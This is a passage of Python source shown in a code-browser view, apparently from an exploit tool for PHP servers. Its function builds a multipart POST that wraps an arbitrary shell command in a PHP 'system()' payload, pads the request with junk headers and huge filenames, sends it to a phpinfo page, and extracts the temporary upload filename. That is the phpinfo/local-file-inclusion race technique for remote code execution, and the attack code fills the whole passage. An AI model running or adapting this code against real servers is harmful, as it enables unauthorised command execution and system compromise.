(headers,cmd,path1,path,test,host)
| 635 | return got |
| 636 | |
| 637 | def phpinfo_request(headers,cmd,path1,path,test,host): |
| 638 | rcvbuf = 1024 |
| 639 | bigz = 3000 |
| 640 | junkheaders = 30 |
| 641 | junkfiles = 40 |
| 642 | junkfilename = '>' * 100000 |
| 643 | z = "Z" * bigz |
| 644 | found = 0 |
| 645 | |
| 646 | phpinfo_headers = {'User-Agent':'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8', |
| 647 | 'Accept-Language':'en-us,en;q=0.5', |
| 648 | 'Accept-Encoding': 'gzip, deflate', |
| 649 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', |
| 650 | 'Accept-Charset': 'windows-1251,utf-8;q=0.7,*;q=0.7', |
| 651 | 'z': z, |
| 652 | 'Connection':'close'} |
| 653 | |
| 654 | if "Cookie" in gen_headers: |
| 655 | phpinfo_headers['Cookie'] = gen_headers['Cookie'] |
| 656 | |
| 657 | loop = range(0,junkheaders) |
| 658 | for count in loop: |
| 659 | phpinfo_headers['z%s' %count] = count |
| 660 | |
| 661 | phpinfo_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------59502863519624080131137623865' |
| 662 | |
| 663 | if("php://" in cmd): |
| 664 | cmd = cmd[6:] |
| 665 | else: |
| 666 | cmd = "system('%s')" %cmd |
| 667 | if(";" not in cmd[-2:]): |
| 668 | cmd = "%s;" %cmd |
| 669 | |
| 670 | content = """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="tfile"; filename="test.html"\nContent-Type: text/html\n\nAbracadabrA <?php %s ?>\n-----------------------------59502863519624080131137623865--""" %(cmd) |
| 671 | loop = range(0,junkfiles) |
| 672 | |
| 673 | for count in loop: |
| 674 | content = content + """-----------------------------59502863519624080131137623865\nContent-Disposition: form-data; name="ffile%d"; filename="%d%s"\nContent-Type: text/html\n\nno\n-----------------------------59502863519624080131137623865--\n""" %(count,count,junkfilename) |
| 675 | |
| 676 | phpinfo_headers['Content-Length'] = '%s' %(len(content)) |
| 677 | got = "" |
| 678 | url = "%s%s" %(host,path) |
| 679 | |
| 680 | try: |
| 681 | if(phpinfo_reverse): |
| 682 | r = requests.post(url=url, headers=phpinfo_headers, data=content) |
| 683 | else: |
| 684 | r = requests.post(url=url, headers=phpinfo_headers, data=content, timeout=20) |
| 685 | except: |
| 686 | return got |
| 687 | |
| 688 | resp = r.text |
| 689 | if("tmp_name" in resp): |
| 690 | found = 1 |
| 691 | lines = resp.split('\n') |
| 692 | for line in lines: |
| 693 | if "tmp_name]" in line: |
| 694 | mystr = str(line) |
no test coverage detected